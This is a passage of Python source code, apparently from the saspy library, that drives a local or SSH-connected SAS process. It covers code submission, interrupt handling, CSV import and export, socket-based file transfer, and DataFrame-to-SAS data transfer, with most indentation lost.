out = self.stdin.write(pgm)
if ods:
self.stdin.write(odsclose)
out = self.stdin.write(undo+logcodei.encode(self.sascfg.encoding)+b'\n')
self.stdin.flush()
bof = False
while not done:
try:
while True:
if os.name == 'nt':
try:
rc = self.pid.wait(0)
self.pid = None
                     return dict(LOG='SAS process has terminated unexpectedly. RC from wait was: '+str(rc), LST='')
except:
pass
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
log = b''
try:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
self._log += logf.decode(self.sascfg.encoding, errors='replace')
except:
pass
self.pid = None
self._sb.SASpid = None
return dict(LOG='SAS process has terminated unexpectedly. Pid State= ' +
str(rc)+'\n'+logf.decode(self.sascfg.encoding, errors='replace'), LST='')
if bail:
eof -= 1
if eof < 0:
break
if os.name == 'nt':
try:
lst = self.stdout.get_nowait()
except Empty:
lst = b''
else:
lst = self.stdout.read1(4096)
if len(lst) > 0:
lstf += lst
if ods and not bof and lstf.count(b"<!DOCTYPE html>", 0, 20) > 0:
bof = True
else:
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
if not bail and bc:
self.stdin.write(undo+odsclose+logcodei.encode(self.sascfg.encoding)+b'\n')
self.stdin.flush()
bc = False
if not bail and logf.count(logcodeo) >= 1:
if ods:
lenf = len(lstf)
if lenf > 20 and bof:
if lstf.count(b"</html>", (lenf - 15), lenf):
bail = True
else:
bail = True
done = True
except (ConnectionResetError):
log = ''
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
try:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
self._log += logf.decode(self.sascfg.encoding, errors='replace')
except:
pass
rc = 0
if os.name == 'nt':
try:
rc = self.pid.wait(0)
except:
pass
else:
rc = os.waitpid(self.pid, 0)
self.pid = None
self._sb.SASpid = None
log = logf.partition(logcodeo)[0]+b'\nConnection Reset: SAS process has terminated unexpectedly. Pid State= '+str(rc).encode()+b'\n'+logf
            return dict(LOG=log.decode(self.sascfg.encoding, errors='replace'), LST='')
except (KeyboardInterrupt, SystemExit):
if not self._sb.sascfg.prompt:
               raise KeyboardInterrupt("Interrupt handling is disabled due to prompting being disabled.")
print('Exception caught!')
ll = self._breakprompt(logcodeo)
if ll.get('ABORT', False):
return ll
logf += ll['LOG']
lstf += ll['LST']
bc = ll['BC']
if not bc:
print('Exception handled :)\n')
else:
print('Exception ignored, continuing to process...\n')
self.stdin.write(undo+odsclose+logcodei.encode(self.sascfg.encoding)+b'\n')
self.stdin.flush()
if ods:
try:
lstf = lstf.decode()
except UnicodeDecodeError:
try:
lstf = lstf.decode(self.sascfg.encoding)
except UnicodeDecodeError:
lstf = lstf.decode(errors='replace')
else:
lstf = lstf.decode(self.sascfg.encoding, errors='replace')
logf = logf.decode(self.sascfg.encoding, errors='replace').replace(chr(12), chr(10))
trip = lstf.rpartition("/*]]>*/")
if len(trip[1]) > 0 and len(trip[2]) < 200:
lstf = ''
self._log += logf
final = logf.partition(logcodei)
z = final[0].rpartition(chr(10))
prev = '%08d' % (self._log_cnt - 1)
zz = z[0].rpartition("E3969440A681A24088859985" + prev)
logd = zz[2].replace(mj.decode(self.sascfg.encoding), '').replace(chr(12), chr(10))
lstd = lstf.replace(chr(12), chr(10)).replace('<body class="c body">',
'<body class="l body">').replace("font-size: x-small;",
"font-size: normal;")
if logd.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
self._sb._lastlog = logd
return dict(LOG=logd, LST=lstd)
def _breakprompt(self, eos):
found = False
logf = b''
lstf = b''
bc = False
if self.pid is None:
self._sb.SASpid = None
return dict(LOG="No SAS process attached. SAS process has terminated unexpectedly.", LST='', ABORT=True)
if self.sascfg.ssh:
response = self.sascfg._prompt(
"SAS attention handling not supported over ssh. Please enter (T) to terminate SAS or (C) to continue.")
while True:
if response is None or response.upper() == 'C':
return dict(LOG=b'', LST=b'', BC=True)
if response.upper() == 'T':
break
response = self.sascfg._prompt("Please enter (T) to terminate SAS or (C) to continue.")
if os.name == 'nt':
self.pid.kill()
else:
interrupt = signal.SIGINT
os.kill(self.pid, interrupt)
sleep(.25)
while True:
if os.name == 'nt':
try:
rc = self.pid.wait(0)
except:
pass
self.pid = None
self._sb.SASpid = None
return dict(LOG='SAS process has terminated unexpectedly. RC from wait was: '+str(rc), LST='',ABORT=True)
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
outrc = str(rc)
return dict(LOG='SAS process has terminated unexpectedly. Pid State= '+outrc, LST='',ABORT=True)
lst = self.stdout.read1(4096)
lstf += lst
if len(lst) > 0:
lsts = lst.rpartition(b'Select:')
if lsts[0] != b'' and lsts[1] != b'':
found = True
query = lsts[1] + lsts[2].rsplit(b'\n?')[0] + b'\n'
print('Processing interrupt\nAttn handler Query is\n\n' + query.decode(self.sascfg.encoding, errors='replace'))
response = None
while response is None:
response = self.sascfg._prompt("Please enter your Response: ")
self.stdin.write(response.encode(self.sascfg.encoding) + b'\n')
self.stdin.flush()
if (response == 'C' or response == 'c') and query.count("C. Cancel") >= 1:
bc = True
break
else:
lsts = lst.rpartition(b'Press')
if lsts[0] != b'' and lsts[1] != b'':
query = lsts[1] + lsts[2].rsplit(b'\n?')[0] + b'\n'
print('Secondary Query is:\n\n' + query.decode(self.sascfg.encoding, errors='replace'))
response = None
while response is None:
response = self.sascfg._prompt("Please enter your Response: ")
self.stdin.write(response.encode(self.sascfg.encoding) + b'\n')
self.stdin.flush()
if (response == 'N' or response == 'n') and query.count("N to continue") >= 1:
bc = True
break
else:
print("******************No 'Select' or 'Press' found. Here's what was found.")
found = True
print('Processing interrupt\nAttn handler Query is\n\n' + lst.decode(self.sascfg.encoding, errors='replace'))
response = None
while response is None:
response = self.sascfg._prompt("Please enter your Response: or N/A only if there are no choices: ")
self.stdin.write(response.encode(self.sascfg.encoding) + b'\n')
self.stdin.flush()
if response in ['N/A', '']:
break
found = True
bc = True
else:
log = self.stderr.read1(4096)
logf += log
self._log += log.decode(self.sascfg.encoding, errors='replace')
if log.count(eos) >= 1:
print("******************Found end of step. No interrupt processed")
found = True
if found:
break
sleep(.25)
lstr = lstf
logr = logf
return dict(LOG=logr, LST=lstr, BC=bc)
def _break(self, inlst=''):
found = False
lst = inlst
interupt = signal.SIGINT
os.kill(self.pid, interupt)
sleep(.25)
self._asubmit('','text')
while True:
if len(lst) > 0:
lsts = lst.rpartition('Select:')
if lsts[0] != '' and lsts[1] != '':
found = True
               print('Processing interrupt\nAttn handler Query is\n\n'+lsts[1]+lsts[2].rsplit('\n?')[0]+'\n')
opt = lsts[2].partition('Cancel Submitted Statements')
if opt[0] != '' and opt[1] != '':
response = opt[0].rpartition('.')[0].rpartition(' ')[2]
else:
opt = lsts[2].partition('Halt DATA')
if opt[0] != '' and opt[1] != '':
response = opt[0].rpartition('.')[0].rpartition(' ')[2]
else:
opt = lsts[2].partition('Cancel the dialog')
if opt[0] != '' and opt[1] != '':
response = opt[0].rpartition('.')[0].rpartition(' ')[2]
else:
print("Unknown 'Select' choices found: ")
response = ''
print("'Select' Response="+response+'\n')
self._asubmit(response+'\n','text')
else:
lsts = lst.rpartition('Press')
if lsts[0] != '' and lsts[1] != '':
                  print('Secondary Query is:\n\n'+lsts[1]+lsts[2].rsplit('\n?')[0]+'\n')
opt = lsts[2].partition(' to exit ')
if opt[0] != '' and opt[1] != '':
response = opt[0].rpartition(' ')[2]
else:
opt = lsts[2].partition('N to continue')
if opt[0] != '' and opt[1] != '':
response = 'Y'
else:
response = 'X'
print("'Press' Response="+response+'\n')
self._asubmit(response+'\n','text')
else:
#print("******************No 'Select' or 'Press' found in lst=")
pass
sleep(.25)
lst = self.stdout.read1(4096).decode(self.sascfg.encoding, errors='replace')
else:
log = self.stderr.read1(4096).decode(self.sascfg.encoding, errors='replace')
self._log += log
logn = self._logcnt(False)
if log.count("E3969440A681A24088859985"+logn+"\n") >= 1:
               print("******************Found end of step. No interrupt processed")
found = True
if found:
ll = self.submit("ods "+self.sascfg.output+" (id=saspy_internal) close;ods listing close;ods listing;libname work list;\n",'text')
break
sleep(.25)
lst = self.stdout.read1(4096).decode(self.sascfg.encoding, errors='replace')
return log
def saslog(self):
"""
this method is used to get the current, full contents of the SASLOG
"""
return self._log
def exist(self, table: str, libref: str ="") -> bool:
"""
table - the name of the SAS Data Set
libref - the libref for the Data Set, defaults to WORK, or USER if assigned
      Returns True if the Data Set exists and False if it does not
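      For example (illustrative; via the SASsession wrapper and assuming the usual sashelp.cars sample table):
      sas.exists('cars', 'sashelp') would return True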
"""
sd = table.strip().replace("'", "''")
code = 'data _null_; e = exist("'
if len(libref):
code += libref+"."
code += "'"+sd+"'n"+'"'+");\n"
code += 'v = exist("'
if len(libref):
code += libref+"."
code += "'"+sd+"'n"+'"'+", 'VIEW');\n if e or v then e = 1;\n"
code += "put 'TABLE_EXISTS=' e 'TAB_EXTEND=';run;"
ll = self.submit(code, "text")
exists = int(ll['LOG'].rpartition("TABLE_EXISTS=")[2].rpartition(" TAB_EXTEND=")[0])
return bool(exists)
def read_csv(self, file: str, table: str, libref: str ="", nosub: bool =False, opts: dict = None) -> '<SASdata object>':
"""
This method will import a csv file into a SAS Data Set and return the SASdata object referring to it.
      file - either the OS filesystem path of the file, or HTTP://... for a url accessible file
table - the name of the SAS Data Set to create
libref - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned
opts - a dictionary containing any of the following Proc Import options(datarow, delimiter, getnames, guessingrows)
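      For example (illustrative call via the SASsession wrapper; names are examples only):
      cars = sas.read_csv('./cars.csv', table='cars', libref='work', opts={'getnames': True})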
"""
opts = opts if opts is not None else {}
code = "filename x "
if file.lower().startswith("http"):
code += "url "
code += "\""+file+"\";\n"
code += "proc import datafile=x out="
if len(libref):
code += libref+"."
code += "'"+table.strip().replace("'", "''")+"'n dbms=csv replace; "+self._sb._impopts(opts)+" run;"
if nosub:
print(code)
else:
ll = self.submit(code, "text")
def write_csv(self, file: str, table: str, libref: str ="", nosub: bool =False, dsopts: dict = None, opts: dict = None) -> 'The LOG showing the results of the step':
"""
This method will export a SAS Data Set to a file in CSV format.
file - the OS filesystem path of the file to be created (exported from the SAS Data Set)
table - the name of the SAS Data Set you want to export to a CSV file
libref - the libref for the SAS Data Set.
dsopts - a dictionary containing any of the following SAS data set options(where, drop, keep, obs, firstobs)
opts - a dictionary containing any of the following Proc Export options(delimiter, putnames)
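      For example (illustrative call via the SASsession wrapper; names are examples only):
      log = sas.write_csv('./cars.csv', 'cars', libref='sashelp', opts={'delimiter': ','})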
"""
dsopts = dsopts if dsopts is not None else {}
opts = opts if opts is not None else {}
code = "filename x \""+file+"\";\n"
code += "options nosource;\n"
code += "proc export data="
if len(libref):
code += libref+"."
code += "'"+table.strip().replace("'", "''")+"'n "+self._sb._dsopts(dsopts)+" outfile=x dbms=csv replace;\n"
code += self._sb._expopts(opts)+" run;\n"
code += "options source;\n"
if nosub:
print(code)
else:
ll = self.submit(code, "text")
return ll['LOG']
def upload_slow(self, localfile: str, remotefile: str, overwrite: bool = True, permission: str = '', **kwargs):
"""
This method uploads a local file to the SAS servers file system.
localfile - path to the local file to upload
remotefile - path to remote file to create or overwrite
overwrite - overwrite the output file if it exists?
permission - permissions to set on the new file. See SAS Filename Statement Doc for syntax
"""
valid = self._sb.file_info(remotefile, quiet = True)
if valid is None:
remf = remotefile
else:
if valid == {}:
remf = remotefile + self._sb.hostsep + localfile.rpartition(os.sep)[2]
else:
remf = remotefile
if overwrite == False:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" exists and overwrite was set to False. Upload was stopped."}
try:
fd = open(localfile, 'rb')
except OSError as e:
return {'Success' : False,
'LOG' : "File "+str(localfile)+" could not be opened. Error was: "+str(e)}
code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
data _null_;
file saspydir;
infile datalines;
input;
lin = length(_infile_);
outdata = inputc(_infile_, '$hex.', lin);
lout = lin/2;
put outdata $varying80. lout;
datalines4;"""
buf = fd.read1(40)
if len(buf):
self._asubmit(code, "text")
else:
code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
data _null_;
fid = fopen('saspydir', 'O');
if fid then
rc = fclose(fid);
run;\n"""
ll = self.submit(code, 'text')
fd.close()
return {'Success' : True,
'LOG' : ll['LOG']}
while len(buf):
buf2 = ''
for i in range(len(buf)):
buf2 += '%02x' % buf[i]
self.stdin.write(buf2.encode()+b'\n')
buf = fd.read1(40)
self._asubmit(";;;;", "text")
ll = self.submit("run;\nfilename saspydir;", 'text')
fd.close()
return {'Success' : True,
'LOG' : ll['LOG']}
def upload(self, localfile: str, remotefile: str, overwrite: bool = True, permission: str = '', **kwargs):
"""
This method uploads a local file to the SAS servers file system.
localfile - path to the local file to upload
remotefile - path to remote file to create or overwrite
overwrite - overwrite the output file if it exists?
permission - permissions to set on the new file. See SAS Filename Statement Doc for syntax
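      For example (illustrative call; paths are examples only):
      res = sas.upload('./model.csv', '/tmp/model.csv', overwrite=True)
      if not res['Success']:
          print(res['LOG'])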
"""
valid = self._sb.file_info(remotefile, quiet = True)
if valid is None:
remf = remotefile
else:
if valid == {}:
remf = remotefile + self._sb.hostsep + localfile.rpartition(os.sep)[2]
else:
remf = remotefile
if overwrite == False:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" exists and overwrite was set to False. Upload was stopped."}
port = kwargs.get('port', 0)
if self.sascfg.ssh and self.sascfg.rtunnel and port == 0:
# we are using a rtunnel; default to that port
port = self.sascfg.rtunnel
host = 'localhost'
else:
return self._upload_client(localfile, remotefile, overwrite, permission, **kwargs)
try:
fd = open(localfile, 'rb')
except OSError as e:
return {'Success' : False,
'LOG' : "File "+str(localfile)+" could not be opened. Error was: "+str(e)}
code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
filename sock socket ':"""+str(port)+"""' server reconn=0 recfm=S lrecl=4096;
data _null_; nb = -1;
infile sock nbyte=nb;
file saspydir;
input;
put _infile_;
run;
filename saspydir;
filename sock;\n"""
self._asubmit(code, "text")
sock = socks.socket()
sock.connect((host, port))
done = False
while not done:
try:
while True:
buf = fd.read1(4096)
sent = 0
send = len(buf)
blen = send
if blen:
while send:
try:
sent = 0
sent = sock.send(buf[blen-send:blen])
except (BlockingIOError):
pass
except (OSError):
sock.close()
fd.close()
sock = socks.socket()
sock.connect((host, port))
fd = open(localfile, 'rb')
sleep(.5)
break
send -= sent
else:
done = True
sock.shutdown(socks.SHUT_RDWR)
sock.close()
fd.close()
break
except (KeyboardInterrupt, Exception) as e:
sock.close()
fd.close()
ll = self.submit("", 'text')
return {'Success' : False,
                 'LOG' : "Upload was interrupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}
ll = self.submit("", 'text')
return {'Success' : True,
'LOG' : ll['LOG']}
def _upload_client(self, localfile: str, remotefile: str, overwrite: bool = True, permission: str = '', **kwargs):
"""
This method uploads a local file to the SAS servers file system.
localfile - path to the local file to upload
remotefile - path to remote file to create or overwrite
overwrite - overwrite the output file if it exists?
permission - permissions to set on the new file. See SAS Filename Statement Doc for syntax
"""
valid = self._sb.file_info(remotefile, quiet = True)
if valid is None:
remf = remotefile
else:
if valid == {}:
remf = remotefile + self._sb.hostsep + localfile.rpartition(os.sep)[2]
else:
remf = remotefile
if overwrite == False:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" exists and overwrite was set to False. Upload was stopped."}
port = kwargs.get('port', 0)
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
if self.sascfg.ssh:
if not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
else:
host = ''
try:
fd = open(localfile, 'rb')
except OSError as e:
return {'Success' : False,
'LOG' : "File "+str(localfile)+" could not be opened. Error was: "+str(e)}
try:
sock = socks.socket()
if self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError:
return {'Success' : False,
                 'LOG' : "Error trying to open a socket in the upload method. Call failed."}
code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S lrecl=4096;
/* filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S encoding=binary lrecl=4096; */
data _null_; nb = -1;
infile sock nbyte=nb;
file saspydir;
input;
put _infile_;
run;
filename saspydir;
filename sock;\n"""
sock.listen(1)
self._asubmit(code, 'text')
if sel.select([sock],[],[],10)[0] == []:
         logger.error("An error occurred in SAS during upload. Check the returned LOG for issues.")
sock.close()
fd.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Failure in upload.\n"+ll['LOG']}
newsock = (0,0)
try:
newsock = sock.accept()
while True:
buf = fd.read1(4096)
sent = 0
send = len(buf)
blen = send
if blen:
while send:
try:
sent = 0
sent = newsock[0].send(buf[blen-send:blen])
except (BlockingIOError):
pass
send -= sent
else:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
sock.close()
fd.close()
break
except (KeyboardInterrupt, Exception) as e:
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
fd.close()
ll = self.submit("", 'text')
return {'Success' : False,
                 'LOG' : "Upload was interrupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}
ll = self.submit("", 'text')
return {'Success' : True,
'LOG' : ll['LOG']}
def download(self, localfile: str, remotefile: str, overwrite: bool = True, **kwargs):
"""
This method downloads a remote file from the SAS servers file system.
localfile - path to the local file to create or overwrite
      remotefile - path to the remote file to download
overwrite - overwrite the output file if it exists?
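      For example (illustrative call; paths are examples only):
      res = sas.download('./local_copy.csv', '/tmp/remote.csv')
      print(res['Success'])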
"""
valid = self._sb.file_info(remotefile, quiet = True)
if valid is None:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" does not exist."}
if valid == {}:
return {'Success' : False,
'LOG' : "File "+str(remotefile)+" is a directory."}
if os.path.isdir(localfile):
locf = localfile + os.sep + remotefile.rpartition(self._sb.hostsep)[2]
else:
locf = localfile
try:
fd = open(locf, 'wb')
except OSError as e:
return {'Success' : False,
'LOG' : "File "+str(locf)+" could not be opened. Error was: "+str(e)}
port = kwargs.get('port', 0)
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
try:
sock = socks.socket()
if self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError:
return {'Success' : False,
                 'LOG' : "Error trying to open a socket in the download method. Call failed."}
if self.sascfg.ssh:
if not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
else:
host = ''
code = """
filename saspydir '"""+remotefile+"""' recfm=F encoding=binary lrecl=4096;
filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S lrecl=4096;
/* filename sock socket '"""+host+""":"""+str(port)+"""' recfm=S encoding=binary; */
data _null_;
file sock;
infile saspydir;
input;
put _infile_;
run;\n"""
sock.listen(1)
self._asubmit(code, 'text')
if sel.select([sock],[],[],10)[0] == []:
         logger.error("An error occurred in SAS during download. Check the returned LOG for issues.")
sock.close()
fd.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Failure in download.\n"+ll['LOG']}
datar = b''
newsock = (0,0)
try:
newsock = sock.accept()
while True:
data = newsock[0].recv(4096)
if len(data):
datar += data
else:
if len(datar):
fd.write(datar)
break
if len(datar) > 8300:
fd.write(datar[:8192])
datar = datar[8192:]
except (KeyboardInterrupt, Exception) as e:
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
fd.close()
ll = self.submit("filename saspydir;", 'text')
return {'Success' : False,
                 'LOG' : "Download was interrupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
sock.close()
fd.flush()
fd.close()
ll = self.submit("filename saspydir;", 'text')
return {'Success' : True,
'LOG' : ll['LOG']}
def _getbytelenF(self, x):
return len(x.encode(self.sascfg.encoding))
def _getbytelenR(self, x):
return len(x.encode(self.sascfg.encoding, errors='replace'))
def dataframe2sasdata(self, df: '<Pandas Data Frame object>', table: str ='a',
libref: str ="", keep_outer_quotes: bool=False,
embedded_newlines: bool=True,
LF: str = '\x01', CR: str = '\x02',
colsep: str = '\x03', colrep: str = ' ',
datetimes: dict={}, outfmts: dict={}, labels: dict={},
outdsopts: dict={}, encode_errors = None, char_lengths = None,
**kwargs):
"""
This method imports a Pandas Data Frame to a SAS Data Set, returning the SASdata object for the new Data Set.
df - Pandas Data Frame to import to a SAS Data Set
table - the name of the SAS Data Set to create
libref - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned
keep_outer_quotes - for character columns, have SAS keep any outer quotes instead of stripping them off.
      embedded_newlines - if any char columns have embedded CR or LF, set this to True to get them imported into the SAS data set
      LF - if embedded_newlines=True, the character to use for LF when transferring the data; defaults to '\x01'
      CR - if embedded_newlines=True, the character to use for CR when transferring the data; defaults to '\x02'
      colsep - the column separator character used for streaming the delimited data to SAS; defaults to '\x03'
datetimes - dict with column names as keys and values of 'date' or 'time' to create SAS date or times instead of datetimes
outfmts - dict with column names and SAS formats to assign to the new SAS data set
labels - dict with column names and SAS Labels to assign to the new SAS data set
outdsopts - a dictionary containing output data set options for the table being created
encode_errors - 'fail' or 'replace' - default is to 'fail', other choice is to 'replace' invalid chars with the replacement char
char_lengths - How to determine (and declare) lengths for CHAR variables in the output SAS data set
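      For example (illustrative call via the SASsession wrapper sas.df2sd(); column and option names are examples only):
      sd = sas.df2sd(df, table='cars', libref='work', datetimes={'sale_ts': 'date'}, outdsopts={'compress': 'yes'})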
"""
input = ""
xlate = ""
card = ""
format = ""
length = ""
label = ""
dts = []
ncols = len(df.columns)
lf = "'"+'%02x' % ord(LF.encode(self.sascfg.encoding))+"'x"
cr = "'"+'%02x' % ord(CR.encode(self.sascfg.encoding))+"'x "
delim = "'"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+"'x "
dts_upper = {k.upper():v for k,v in datetimes.items()}
dts_keys = dts_upper.keys()
fmt_upper = {k.upper():v for k,v in outfmts.items()}
fmt_keys = fmt_upper.keys()
lab_upper = {k.upper():v for k,v in labels.items()}
lab_keys = lab_upper.keys()
if encode_errors is None:
encode_errors = 'fail'
if type(char_lengths) is not dict or len(char_lengths) < ncols:
charlens = self._sb.df_char_lengths(df, encode_errors, char_lengths)
else:
charlens = char_lengths
if charlens is None:
return -1
chr_upper = {k.upper():v for k,v in charlens.items()}
if type(df.index) != pd.RangeIndex:
         warnings.warn("Note that Indexes are not transferred over as columns. Only actual columns are transferred")
for name in df.columns:
colname = str(name).replace("'", "''")
col_up = str(name).upper()
input += "'"+colname+"'n "
if col_up in lab_keys:
label += "label '"+colname+"'n ="+lab_upper[col_up]+";\n"
if col_up in fmt_keys:
format += "'"+colname+"'n "+fmt_upper[col_up]+" "
if df.dtypes[name].kind in ('O','S','U','V'):
try:
length += " '"+colname+"'n $"+str(chr_upper[col_up])
except KeyError as e:
logger.error("Dictionary provided as char_lengths is missing column: "+colname)
raise e
if keep_outer_quotes:
input += "~ "
dts.append('C')
if embedded_newlines:
xlate += " '"+colname+"'n = translate('"+colname+"'n, '0A'x, "+lf+");\n"
xlate += " '"+colname+"'n = translate('"+colname+"'n, '0D'x, "+cr+");\n"
else:
if df.dtypes[name].kind in ('M'):
length += " '"+colname+"'n 8"
input += ":B8601DT26.6 "
if col_up not in dts_keys:
if col_up not in fmt_keys:
format += "'"+colname+"'n E8601DT26.6 "
else:
if dts_upper[col_up].lower() == 'date':
if col_up not in fmt_keys:
format += "'"+colname+"'n E8601DA. "
xlate += " '"+colname+"'n = datepart('"+colname+"'n);\n"
else:
if dts_upper[col_up].lower() == 'time':
if col_up not in fmt_keys:
format += "'"+colname+"'n E8601TM. "
xlate += " '"+colname+"'n = timepart('"+colname+"'n);\n"
else:
logger.warning("invalid value for datetimes for column "+colname+". Using default.")
if col_up not in fmt_keys:
format += "'"+colname+"'n E8601DT26.6 "
dts.append('D')
else:
length += " '"+colname+"'n 8"
if df.dtypes[name] == 'bool':
dts.append('B')
else:
dts.append('N')
port = kwargs.get('port', 0)
if self.sascfg.ssh and self.sascfg.rtunnel and port == 0:
# we are using a rtunnel; default to that port
server = True
port = self.sascfg.rtunnel
host = 'localhost'
code = """filename sock socket ':"""+str(port)+"""' server reconn=0 recfm=V termstr=LF;\n"""
else:
server = False
if port==0 and self.sascfg.tunnel:
# we are using a tunnel; default to that port
port = self.sascfg.tunnel
if self.sascfg.ssh:
if not self.sascfg.tunnel:
host = self.sascfg.hostip #socks.gethostname()
else:
host = 'localhost'
else:
host = ''
try:
sock = socks.socket()
if self.sascfg.tunnel:
sock.bind(('localhost', port))
else:
sock.bind(('', port))
port = sock.getsockname()[1]
except OSError as e:
raise e
code = """filename sock socket '"""+host+""":"""+str(port)+"""' recfm=V termstr=LF;\n"""
code += "data "
if len(libref):
code += libref+"."
code += "'"+table.strip().replace("'", "''")+"'n"
if len(outdsopts):
code += '('
for key in outdsopts:
code += key+'='+str(outdsopts[key]) + ' '
code += ");\n"
else:
code += ";\n"
if len(length):
code += "length"+length+";\n"
if len(format):
code += "format "+format+";\n"
code += label
code += "infile sock nbyte=nb delimiter="+delim+" STOPOVER;\ninput @;\nif _infile_ = '' then delete;\n"
code += "else do;\n input "+input+";\n"+xlate+";\nend;\nrun;\nfilename sock;\n"
if not server:
sock.listen(1)
self._asubmit(code, "text")
if server:
sleep(1)
sock = socks.socket()
sock.connect((host, port))
ssock = sock
if not server:
if sel.select([sock],[],[],10)[0] == []:
            logger.error("An error occurred in SAS during data transfer. Check the LOG for issues.")
sock.close()
ll = self.submit("", 'text')
return {'Success' : False,
'LOG' : "Failure in upload.\n"+ll['LOG']}
newsock = (0,0)
try:
newsock = sock.accept()
except (KeyboardInterrupt, Exception) as e:
try:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
            logger.error("An error occurred in SAS during data transfer. Check the LOG for issues.")
ll = self.submit("", 'text')
return {'Success' : False,
                    'LOG' : "Data transfer was interrupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}
ssock = newsock[0]
logf = b''
first = True
fail = False
blksz = int(kwargs.get('blocksize', 32767))
row_num = 0
code = ""
for row in df.itertuples(index=False):
row_num += 1
card = ""
for col in range(ncols):
var = str(row[col])
if dts[col] == 'N' and var == 'nan':
var = '.'
elif dts[col] == 'C':
if var == 'nan' or len(var) == 0:
var = ' '
else:
var = var.replace(colsep, colrep)
elif dts[col] == 'B':
var = str(int(row[col]))
elif dts[col] == 'D':
if var in ['nan', 'NaT', 'NaN']:
var = '.'
else:
var = str(row[col].to_datetime64())[:26]
card += var
if col < (ncols-1):
card += colsep
if embedded_newlines:
card = card.replace(LF, colrep).replace(CR, colrep)
card = card.replace('\n', LF).replace('\r', CR)
code += card+"\n"
if len(code) > blksz:
first = False
if encode_errors != 'replace':
try:
code = code.encode(self.sascfg.encoding)
except Exception as e:
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
logd = logf.decode(self.sascfg.encoding, errors='replace')
self._log += logd
if logd.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
ll = self.submit("", 'text')
logger.error("Transcoding error encountered. Data transfer stopped on or before row "+str(row_num))
logger.error("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
return row_num
else:
code = code.encode(self.sascfg.encoding, errors='replace')
sent = 0
send = len(code)
blen = send
while send:
try:
sent = 0
sent = ssock.send(code[blen-send:blen])
except (BlockingIOError):
pass
except (OSError) as e:
if fail:
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
logger.error("Failed connecting to server socket. Check the SASLOG to see the error")
ll = self.submit("", 'text')
return row_num
fail = True
if server:
sock.close()
sock = socks.socket()
sock.connect((host, port))
ssock = sock
sleep(1)
pass
send -= sent
code = ""
if os.name == 'nt':
try:
log = self.stderr.get_nowait()
except Empty:
log = b''
else:
log = self.stderr.read1(4096)
if len(log) > 0:
logf += log
logd = logf.decode(self.sascfg.encoding, errors='replace')
self._log += logd
if logd.count('ERROR:') > 0:
warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
self._sb.check_error_log = True
if len(code):
if encode_errors != 'replace':
try:
code = code.encode(self.sascfg.encoding)
except Exception as e:
try:
if server:
sock.shutdown(socks.SHUT_RDWR)
else:
if newsock[0]:
newsock[0].shutdown(socks.SHUT_RDWR)
newsock[0].close()
except:
pass
sock.close()
ll = self.submit("", 'text')
logger.error("Transcoding error encountered. Data transfer stopped on row "+str(row_num))
logger.error("DataFrame contains characters that can't be transcoded into the SAS session encoding.\n"+str(e))
return row_num
else:
code = code.encode(self.sascfg.encoding, errors='replace')
sent = 0
send = len(code)
blen = send
while send:
try:
sent = 0
sent = ssock.send(code[blen-send:blen])
except (BlockingIOError):
pass
except (OSError) as e:
if not first:
